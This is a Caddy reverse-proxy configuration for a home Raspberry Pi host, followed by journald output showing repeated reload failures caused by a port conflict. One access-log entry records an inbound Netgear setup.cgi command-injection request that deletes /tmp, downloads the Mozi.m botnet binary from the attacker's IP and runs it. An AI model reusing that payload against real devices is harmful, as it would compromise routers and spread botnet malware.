simoxhomenet.ddns.net {
	log {
		output stderr
		level DEBUG
		format console
	}

	handle /oauth/* {
		root * /var/www/html
		file_server
	}

	handle_path /pocketbase/* {
		reverse_proxy localhost:8090
	}

	handle {
		root * /var/www/exptra
		try_files {path} /index.html
		file_server
	}
}

simoxhomenet.ddns.net:8089 {
	reverse_proxy localhost:7089 {
		header_up Upgrade {http.request.header.Upgrade}
		header_up Connection {http.request.header.Connection}
		header_up Access-Control-Allow-Origin *
	}
}

simoxhomenet.ddns.net:9080 {
	reverse_proxy localhost:9080 {
		header_up Upgrade {http.request.header.Upgrade}
		header_up Connection {http.request.header.Connection}
	}
}

simoxhomenet.ddns.net:8080 {
	reverse_proxy localhost:8080 {
		header_up Upgrade {http.request.header.Upgrade}
		header_up Connection {http.request.header.Connection}
	}
}

simoxhomenet.ddns.net:9443 {
	reverse_proxy localhost:9443 {
		header_up Upgrade {http.request.header.Upgrade}
		header_up Connection {http.request.header.Connection}
	}
}

simoxhomenet.ddns.net:8443 {
	reverse_proxy localhost:5678 {
		header_up Upgrade {http.request.header.Upgrade}
		header_up Connection {http.request.header.Connection}
	}
}

simoxhomenet.ddns.net:1080 {
	handle /v1/* {
		reverse_proxy localhost:10080
	}
	handle {
		root * /var/www/navipark
		try_files {path} /index.html
		file_server
	}
}

sudo journalctl -u caddy -f
Mar 27 02:30:44 RasperryPi4 caddy[1449]: {"level":"error","ts":1774575044.1405895,"logger":"admin.api","msg":"request error","error":"loading config: loading new config: http app module: start: listening on :11000: listen tcp :11000: bind: address already in use","status_code":400}
Mar 27 02:30:44 RasperryPi4 caddy[3916131]: Error: sending configuration to instance: caddy responded with error: HTTP 400: {"error":"loading config: loading new config: http app module: start: listening on :11000: listen tcp :11000: bind: address already in use"}
Mar 27 02:30:44 RasperryPi4 systemd[1]: caddy.service: Control process exited, code=exited, status=1/FAILURE
Mar 27 02:30:44 RasperryPi4 caddy[1449]: {"level":"info","ts":1774575044.1799965,"logger":"admin","msg":"stopped previous server","address":"localhost:2019"}
Mar 27 02:32:13 RasperryPi4 systemd[1]: caddy.service: Reload operation timed out. Killing reload process.
Mar 27 02:32:39 RasperryPi4 caddy[1449]: {"level":"info","ts":1774575159.320232,"logger":"http.log.access","msg":"handled request","request":{"remote_ip":"223.151.251.178","remote_port":"39094","client_ip":"223.151.251.178","proto":"HTTP/1.0","method":"GET","host":"","uri":"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://223.151.251.178:37348/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1","headers":{}},"bytes_read":0,"user_id":"","duration":0.000054369,"size":0,"status":308,"resp_headers":{"Connection":["close"],"Location":["https:///setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://223.151.251.178:37348/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1"],"Content-Type":[],"Server":["Caddy"]}}
Mar 27 02:33:44 RasperryPi4 systemd[1]: caddy.service: Reload operation timed out. Killing reload process.
Mar 27 02:35:14 RasperryPi4 systemd[1]: caddy.service: Reload operation timed out. Killing reload process.
Mar 27 02:36:44 RasperryPi4 systemd[1]: caddy.service: Reload operation timed out. Killing reload process.
Mar 27 02:38:14 RasperryPi4 systemd[1]: caddy.service: Reload operation timed out. Killing reload process.
Mar 27 02:39:45 RasperryPi4 systemd[1]: caddy.service: Reload operation timed out. Killing reload process.
